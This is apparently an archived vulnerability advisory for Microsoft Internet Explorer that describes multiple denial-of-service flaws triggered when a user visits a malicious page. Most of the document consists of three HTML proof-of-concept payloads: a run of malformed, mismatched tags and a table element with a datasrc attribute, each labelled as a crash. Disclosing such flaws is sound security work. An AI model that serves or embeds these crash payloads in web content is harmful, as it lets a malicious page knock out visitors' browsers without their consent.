source: https://www.securityfocus.com/bid/16070/info

Microsoft Internet Explorer is affected by multiple denial of service vulnerabilities.

An attacker may exploit these issues by enticing a user to visit a malicious site resulting in a denial of service condition in the application. 

Crash 1:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN">
> </samp></colgroup><ul><font><menu> <code> <var>
> <sub><h2></fieldset>
> </kbd></frameset>
> </ins></map></noframes>
> </isindex>
> </code>
> </div></title>
> </del></var><isindex>
> <i>

Crash 2:
> <acronym><dd><h5><applet></caption></applet><li></h1>

Crash 3:
> <table datasrc=".">